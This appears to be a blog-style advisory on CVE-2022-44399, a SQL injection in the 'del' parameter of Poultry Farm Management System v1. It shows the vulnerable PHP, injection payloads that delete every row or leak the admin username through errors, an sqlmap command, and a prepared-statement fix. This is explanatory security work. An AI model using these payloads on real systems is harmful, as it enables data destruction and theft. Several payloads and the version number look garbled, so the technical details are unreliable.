CVE-2022-44399 - SQL Injection in Poultry Farm Management System v1. (del Parameter Exploit)

If you’re running a Poultry Farm Management System (PFMS) v1.—especially from the Redcock-Farm template—you need to pay attention to a serious SQL injection bug tracked as CVE-2022-44399. This vulnerability lets attackers run their own SQL queries against your database, which can compromise your farm’s data, leak sensitive information or even let attackers take control of the backend. In this long read, I’ll explain in simple terms how it works, how you can try it (for testing and research!), and how to protect yourself.

What is CVE-2022-44399?

CVE-2022-44399 refers to a SQL injection vulnerability found in the Poultry Farm Management System v1., specifically in the category.php script at /Redcock-Farm/farm/category.php. This happens because user input in the del parameter isn’t properly sanitized before going into the database query.

Any user, including attackers, can send specially crafted data to that parameter and inject their own SQL. This can have serious consequences!

Where’s the Flaw?

Let’s take a look at the typical request the web app makes when someone wants to delete a poultry category:

GET /Redcock-Farm/farm/category.php?del=5

Here, 5 should refer to a category ID. But what if, instead of a simple number, an attacker sends risky SQL?

In category.php, you might see code like

<?php
include('db.php');
if(isset($_GET['del'])) {
    $id = $_GET['del'];
    $result = mysqli_query($conn, "DELETE FROM category WHERE id='$id'");
    if ($result) {
        echo "Category deleted.";
    }
}
?>

Here’s the flaw: $id is used directly in the SQL with no filtering, escaping, or prepared statements. Whatever an attacker puts in the del parameter will get run.

Demo: Exploiting the SQL Injection

Let’s say an attacker wants to extract user info from an admin table. They could craft a URL like:

/Redcock-Farm/farm/category.php?del=5' OR 1=1 -- -

This changes the SQL statement from

DELETE FROM category WHERE id='5';

to

DELETE FROM category WHERE id='5' OR 1=1 -- -'

Which deletes all rows from the category table, because 1=1 is always true.

Reading Data Instead of Deleting

The above example deletes rows, but a smart attacker can use error-based or blind SQL injection techniques to *read* sensitive information, even if the script doesn’t return results directly.

Suppose the attacker wants to force an SQL error to leak data

/Redcock-Farm/farm/category.php?del=5' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT username FROM admin LIMIT ,1),x7e,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -

If the database throws an error, it might leak the username of the admin in the error message.

Here’s how to automate it with sqlmap

sqlmap -u "http://target/Redcock-Farm/farm/category.php?del=1"; --batch --dbs

Sqlmap will probe the parameter and extract available databases.

Original References

- Exploit Database - CVE-2022-44399
- NVD CVE Detail
- Packet Storm Security Notice

Secure Code Example

$id = $_GET['del'];
$stmt = $conn->prepare("DELETE FROM category WHERE id=?");
$stmt->bind_param('i', $id);
$stmt->execute();
$stmt->close();

This way, SQL code and user data are kept separate—no injection possible.

Final Thoughts

CVE-2022-44399 is a classic but very critical SQL injection bug. The Poultry Farm Management System v1. is used by lots of small businesses, meaning attackers can do real damage with little effort. Always keep your software updated and review your code for vulnerabilities. If you suspect you’ve been hit, update your code (or apply vendor patches if available) immediately!

Timeline

Published on: 11/28/2022 16:15:00 UTC
Last modified on: 12/01/2022 22:53:00 UTC